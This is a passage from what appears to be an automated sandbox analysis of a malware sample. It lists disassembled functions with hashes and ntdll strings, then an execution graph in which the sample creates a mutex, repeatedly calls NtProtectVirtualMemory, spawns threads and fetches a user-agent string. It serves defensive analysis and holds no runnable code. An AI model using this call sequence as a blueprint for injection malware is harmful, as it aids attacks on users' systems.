                                                                                                                                                                                                                      • Instruction ID: 9a6885a1fd2ea282cb18f897240086c7c2cb01fe6aa4e0ed9eda1b9099cf438e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e58d258b816884e1ca939ac94a3adb0427ca104085f8c42ecbc945b6a33f3885
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F90022124545112E650715C84046164005A7E1341F55C032A0818594E895989567225
                                                                                                                                                                                                                      Function 00F83D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 2bcdc592d71d5028096a0a3a5836443e3b2e11291cd48ac973a6608800e58ea1
                                                                                                                                                                                                                      • Instruction ID: f0aa336df0f142df63d73ed93eae16addfee2759f4e7c326b08a7efb5cc612ad
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bcdc592d71d5028096a0a3a5836443e3b2e11291cd48ac973a6608800e58ea1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A90023520140412EA1071589804646004687D1341F55D422A0428558E8A5889A2B125
                                                                                                                                                                                                                      Function 00F83D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 907bfdf5efde5e00eb7748f62eed914d6d3c857134f834ad7cf2fb804eb39f27
                                                                                                                                                                                                                      • Instruction ID: 71aa13fbd463bb3028e2254f75ee3d64b023748735735a0fac6d38e7218a9ffb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 907bfdf5efde5e00eb7748f62eed914d6d3c857134f834ad7cf2fb804eb39f27
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D190023120240152AA4072589804A4E410587E2342B95D426A0019554DCD1889626225
                                                                                                                                                                                                                      Function 00F82C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                      • Instruction ID: 5857ab9bb1c272872b311a025d13eebebf94a0675d5f6af1f137923f8e1fe4e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                      Function 00F82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                                                                                      • Opcode ID: 9e5700215f7fb4fbb63c440a8c9d31fb3098d3da0a3e857021f7aa7ee3615dd7
                                                                                                                                                                                                                      • Instruction ID: 0ac839b9178f735a858f5750f2e5966e4d1e038a1c8872456d4c7d60f48d01a7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e5700215f7fb4fbb63c440a8c9d31fb3098d3da0a3e857021f7aa7ee3615dd7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2751FAB6E00116BFDF60EF9988806BEF7B8BB08310B148169E465D7641D734EF50BBA1
                                                                                                                                                                                                                      Function 00FF2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                                                                                      • Opcode ID: 920fd44db904e17dbffd41d53bbb18f03a0b2806031b4319303480ab8c83d573
                                                                                                                                                                                                                      • Instruction ID: 479c74eda0a18db546384d7eeac1ce12caf0859c7d5b60684302ffd34c1d6e36
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 920fd44db904e17dbffd41d53bbb18f03a0b2806031b4319303480ab8c83d573
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A512671A00649AFCB70DF9CCC9097FB7F8EF44310B088459E695C3692EAB4DE00AB60
                                                                                                                                                                                                                      Function 00F77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 00FB4787
                                                                                                                                                                                                                      • Execute=1, xrefs: 00FB4713
                                                                                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00FB46FC
                                                                                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00FB4655
                                                                                                                                                                                                                      • ExecuteOptions, xrefs: 00FB46A0
                                                                                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00FB4725
                                                                                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00FB4742
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                                                                                      • Opcode ID: a3905a08bd52c5b2535025f44276322e25373d4b3f83391b3b095e1bde6f5ed1
                                                                                                                                                                                                                      • Instruction ID: a398b8c5c0db74dcad84b0ffc538ea3f47a68c79cdfd9781d5a54e907f524b5e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3905a08bd52c5b2535025f44276322e25373d4b3f83391b3b095e1bde6f5ed1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB513A31A143197ADF10BAA4EC86FED73A8EF14310F1440AAE509A7181EB75AE45EF52
                                                                                                                                                                                                                      Function 01016940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                                                                                                      • Instruction ID: ebb7a05e70aa8ad21a893501795c1ac68093d707ca2dc0f62ec1fd4371f7f496
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2022571508341AFD345DF18C890A6BBBE5FFC8700F448A6DF9858B268DB7AE945CB42
                                                                                                                                                                                                                      Function 00F8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                                                                                                      • String ID: +$-$0$0
                                                                                                                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                                                                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                      • Instruction ID: d902d8f3d58bdbe80343c5727dbe56f1ce6a32c90d7292c714adb5b3d6087e40
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA81E330E052499EDF24EF68C8917FEBBB5AF85330F18425AE861A72D1D7349C41EB50
                                                                                                                                                                                                                      Function 00FF20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                                                                                                                      • Opcode ID: 9af872a9c25d13fcbb8761612d2cc06efd6a54cd921a2b69cbb374bfb4ec7101
                                                                                                                                                                                                                      • Instruction ID: c04c9d1ce6a266c1c97543bc6956cb6c624eb46eafe547f7ab458103036792c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9af872a9c25d13fcbb8761612d2cc06efd6a54cd921a2b69cbb374bfb4ec7101
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34218EB6E0011DABDB50DE69CC41AFEBBE8AF54754F040126EA05E3251EB34DA01ABA5
                                                                                                                                                                                                                      Function 00F6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • RTL: Re-Waiting, xrefs: 00FB031E
                                                                                                                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FB02BD
                                                                                                                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FB02E7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                      • API String ID: 0-2474120054
                                                                                                                                                                                                                      • Opcode ID: d73561c0decccfd23021b045da346fc9c3bd8cc97938db959cb56235198aac0a
                                                                                                                                                                                                                      • Instruction ID: d8fbed5575a5db16d8bbd821b96bc733c6c8255eb8bd304daabd3938aad7117e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d73561c0decccfd23021b045da346fc9c3bd8cc97938db959cb56235198aac0a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1E1E131A047419FD724CF28D885B6AB7E0BF84324F240A6DF4A5CB2E1DB75D949EB42
                                                                                                                                                                                                                      Function 00F7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00FB7B7F
                                                                                                                                                                                                                      • RTL: Re-Waiting, xrefs: 00FB7BAC
                                                                                                                                                                                                                      • RTL: Resource at %p, xrefs: 00FB7B8E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                      • API String ID: 0-871070163
                                                                                                                                                                                                                      • Opcode ID: 114863093132ac1726ca9e8607fe5b3418641aeb796c246ea539615a1d3fa2be
                                                                                                                                                                                                                      • Instruction ID: 3d6773fb05553b6485d4cbcf68ca1fc219a04869d2752dbcce0723f4e00a6568
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 114863093132ac1726ca9e8607fe5b3418641aeb796c246ea539615a1d3fa2be
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C41E5317057029FC720DE25DC41BAAB7E5EF85720F104A1EF85ADB281DB31E905AF92
                                                                                                                                                                                                                      Function 00F7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB728C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00FB7294
                                                                                                                                                                                                                      • RTL: Re-Waiting, xrefs: 00FB72C1
                                                                                                                                                                                                                      • RTL: Resource at %p, xrefs: 00FB72A3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                                                                                                                      • Opcode ID: 22bd92fc3c8eaa868eeef8bf1d21f2f6b3525c402e65d67b1231138edf2d13df
                                                                                                                                                                                                                      • Instruction ID: b8a23c1049469fde6adb77de265a705d9346610e654c90123ffee8459a0c8430
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22bd92fc3c8eaa868eeef8bf1d21f2f6b3525c402e65d67b1231138edf2d13df
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11410531B04312ABC720EE25CC42FA6B7A5FF95720F144619F859EB281DB31E846ABD1
                                                                                                                                                                                                                      Function 00FF2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                                                                                                                      • Opcode ID: 4c7386949c3efa3a893cab03ecc36378dd7bda801d845e86116b8957dbec71f2
                                                                                                                                                                                                                      • Instruction ID: 27e7d9ab7cf0154801fc211782ab89d71d4d64f38d822510601f1329393af763
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c7386949c3efa3a893cab03ecc36378dd7bda801d845e86116b8957dbec71f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14318272A0061D9FDB60DE28CC41BFEB7B8EF44710F444556E949E3241EB34EA44ABA0
                                                                                                                                                                                                                      Function 00F87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                                                                                                      • String ID: +$-
                                                                                                                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                                                                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                                                                      • Instruction ID: 1fb6bf95b9fb458ea6d30d3124fd390cb1c2b98b5dc566514368c1421ddd78ee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7491A171E0831A9ADF24FE6AC8817FEB7A1AF44370F74451AE965A72C0DB30DD41A760
                                                                                                                                                                                                                      Function 00F49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: $$@
                                                                                                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                                                                                                      • Opcode ID: e8b035115dc05aacc2258adaf0b888396525cbc274848e139041202396f33ae5
                                                                                                                                                                                                                      • Instruction ID: 29d6c1afd1346209c1cdc015f37ef4767f513cbc6311bc0c5427770e98433762
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8b035115dc05aacc2258adaf0b888396525cbc274848e139041202396f33ae5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F812D71E012699BDB35DB54CC45BEEB7B8AF48710F0441EAE909B7280D7745E84DFA0
                                                                                                                                                                                                                      Function 00FCCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00FCCFBD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CallFilterFunc@8
                                                                                                                                                                                                                      • String ID: @$@4Cw@4Cw
                                                                                                                                                                                                                      • API String ID: 4062629308-3101775584
                                                                                                                                                                                                                      • Opcode ID: 232f84934b81fe59648976eebfbc0cc34439b24806f4a6dc8b4838b13d641f3f
                                                                                                                                                                                                                      • Instruction ID: 99ede4ccf924a1596f80de5cee8173d454a60c692db93c20d0b787f0c8cb0ae3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 232f84934b81fe59648976eebfbc0cc34439b24806f4a6dc8b4838b13d641f3f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66419C71D00219DFCB21EFA9C942BADBBB8BF45B10F00402EE944DB255E639D905EB64

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:2.3%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:4.7%
                                                                                                                                                                                                                      Total number of Nodes:446
                                                                                                                                                                                                                      Total number of Limit Nodes:17
                                                                                                                                                                                                                      execution_graph 13925 fe96aa9 13926 fe96aaf 13925->13926 13929 fe91212 13926->13929 13928 fe96ac7 13930 fe9121b 13929->13930 13931 fe91237 13929->13931 13930->13931 13932 fe910c2 6 API calls 13930->13932 13931->13928 13932->13931 13949 fe9022a 13950 fe9025e 13949->13950 13951 fe8f8c2 ObtainUserAgentString 13950->13951 13952 fe9026b 13951->13952 13490 fe95bac 13491 fe95bb1 13490->13491 13524 fe95bb6 13491->13524 13525 fe8bb72 13491->13525 13493 fe95c2c 13494 fe95c85 13493->13494 13496 fe95c69 13493->13496 13497 fe95c54 13493->13497 13493->13524 13495 fe93ab2 NtProtectVirtualMemory 13494->13495 13498 fe95c8d 13495->13498 13500 fe95c6e 13496->13500 13501 fe95c80 13496->13501 13499 fe93ab2 NtProtectVirtualMemory 13497->13499 13562 fe8d102 13498->13562 13504 fe95c5c 13499->13504 13505 fe93ab2 NtProtectVirtualMemory 13500->13505 13501->13494 13502 fe95c97 13501->13502 13506 fe95c9c 13502->13506 13507 fe95cbe 13502->13507 13548 fe8cee2 13504->13548 13509 fe95c76 13505->13509 13529 fe93ab2 13506->13529 13511 fe95cd9 13507->13511 13512 fe95cc7 13507->13512 13507->13524 13554 fe8cfc2 13509->13554 13516 fe93ab2 NtProtectVirtualMemory 13511->13516 13511->13524 13513 fe93ab2 NtProtectVirtualMemory 13512->13513 13515 fe95ccf 13513->13515 13572 fe8d2f2 13515->13572 13519 fe95ce5 13516->13519 13517 fe95cac 13540 fe8cde2 13517->13540 13590 fe8d712 13519->13590 13527 fe8bb93 13525->13527 13526 fe8bcce 13526->13493 13527->13526 13528 fe8bcb5 CreateMutexExW 13527->13528 13528->13526 13530 fe93adf 13529->13530 13531 fe93ef1 13530->13531 13532 fe93ebc 13530->13532 13602 fe898f2 13530->13602 13531->13517 13532->13517 13534 fe93e5c 13535 fe898f2 NtProtectVirtualMemory 13534->13535 13536 fe93e7c 13535->13536 13537 fe898f2 NtProtectVirtualMemory 13536->13537 13538 fe93e9c 13537->13538 13539 fe898f2 NtProtectVirtualMemory 13538->13539 13539->13532 13541 fe8cdf0 13540->13541 13543 fe8cecd 13541->13543 13627 fe90382 13541->13627 13544 fe89412 13543->13544 13545 fe89440 13544->13545 13546 fe89473 13545->13546 13547 fe8944d CreateThread 13545->13547 13546->13524 13547->13524 13550 fe8cf06 13548->13550 13549 fe8cfa4 13549->13524 13550->13549 13551 fe898f2 NtProtectVirtualMemory 13550->13551 13552 fe8cf9c 13551->13552 13553 fe90382 ObtainUserAgentString 13552->13553 13553->13549 13556 fe8d016 13554->13556 13555 fe8d0f0 13555->13524 13556->13555 13559 fe898f2 NtProtectVirtualMemory 13556->13559 13560 fe8d0bb 13556->13560 13557 fe8d0e8 13558 fe90382 ObtainUserAgentString 13557->13558 13558->13555 13559->13560 13560->13557 13561 fe898f2 NtProtectVirtualMemory 13560->13561 13561->13557 13564 fe8d137 13562->13564 13563 fe8d2d5 13563->13524 13564->13563 13565 fe898f2 NtProtectVirtualMemory 13564->13565 13566 fe8d28a 13565->13566 13567 fe898f2 NtProtectVirtualMemory 13566->13567 13570 fe8d2a9 13567->13570 13568 fe8d2cd 13569 fe90382 ObtainUserAgentString 13568->13569 13569->13563 13570->13568 13571 fe898f2 NtProtectVirtualMemory 13570->13571 13571->13568 13573 fe8d349 13572->13573 13574 fe8d49f 13573->13574 13576 fe898f2 NtProtectVirtualMemory 13573->13576 13575 fe898f2 NtProtectVirtualMemory 13574->13575 13579 fe8d4c3 13574->13579 13575->13579 13577 fe8d480 13576->13577 13578 fe898f2 NtProtectVirtualMemory 13577->13578 13578->13574 13580 fe898f2 NtProtectVirtualMemory 13579->13580 13581 fe8d597 13579->13581 13580->13581 13582 fe898f2 NtProtectVirtualMemory 13581->13582 13584 fe8d5bf 13581->13584 13582->13584 13583 fe8d6e1 13585 fe90382 ObtainUserAgentString 13583->13585 13586 fe898f2 NtProtectVirtualMemory 13584->13586 13587 fe8d6b9 13584->13587 13588 fe8d6e9 13585->13588 13586->13587 13587->13583 13589 fe898f2 NtProtectVirtualMemory 13587->13589 13588->13524 13589->13583 13591 fe8d767 13590->13591 13592 fe898f2 NtProtectVirtualMemory 13591->13592 13597 fe8d903 13591->13597 13593 fe8d8e3 13592->13593 13594 fe898f2 NtProtectVirtualMemory 13593->13594 13594->13597 13595 fe8d9b7 13596 fe90382 ObtainUserAgentString 13595->13596 13599 fe8d9bf 13596->13599 13598 fe8d992 13597->13598 13600 fe898f2 NtProtectVirtualMemory 13597->13600 13598->13595 13601 fe898f2 NtProtectVirtualMemory 13598->13601 13599->13524 13600->13598 13601->13595 13603 fe89987 13602->13603 13606 fe899b2 13603->13606 13617 fe8a622 13603->13617 13605 fe89c0c 13605->13534 13606->13605 13607 fe89ba2 13606->13607 13609 fe89ac5 13606->13609 13608 fe95e12 NtProtectVirtualMemory 13607->13608 13616 fe89b5b 13608->13616 13621 fe95e12 13609->13621 13611 fe95e12 NtProtectVirtualMemory 13611->13605 13612 fe89ae3 13612->13605 13613 fe89b3d 13612->13613 13615 fe95e12 NtProtectVirtualMemory 13612->13615 13614 fe95e12 NtProtectVirtualMemory 13613->13614 13614->13616 13615->13613 13616->13605 13616->13611 13619 fe8a67a 13617->13619 13618 fe8a67e 13618->13606 13619->13618 13620 fe95e12 NtProtectVirtualMemory 13619->13620 13620->13619 13622 fe95e45 NtProtectVirtualMemory 13621->13622 13625 fe94942 13621->13625 13624 fe95e70 13622->13624 13624->13612 13626 fe94967 13625->13626 13626->13622 13628 fe903c7 13627->13628 13631 fe90232 13628->13631 13630 